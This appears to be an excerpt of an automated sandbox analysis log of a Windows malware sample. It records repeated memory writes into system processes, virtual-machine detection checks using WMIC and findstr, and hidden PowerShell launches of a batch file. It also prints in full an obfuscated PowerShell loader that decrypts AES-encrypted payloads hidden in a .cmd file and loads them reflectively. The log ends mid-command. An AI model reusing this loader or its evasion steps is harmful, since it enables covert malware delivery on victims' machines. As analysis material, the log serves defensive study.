Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: A40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B421F20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B421F50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24D756E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24D75710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EBD5460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EBD5490000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B4448A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B4448D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FE3A940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6C0940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6C0990000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 18FE8A50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2C9A6100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2C9A6150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F188E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 25791060000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression 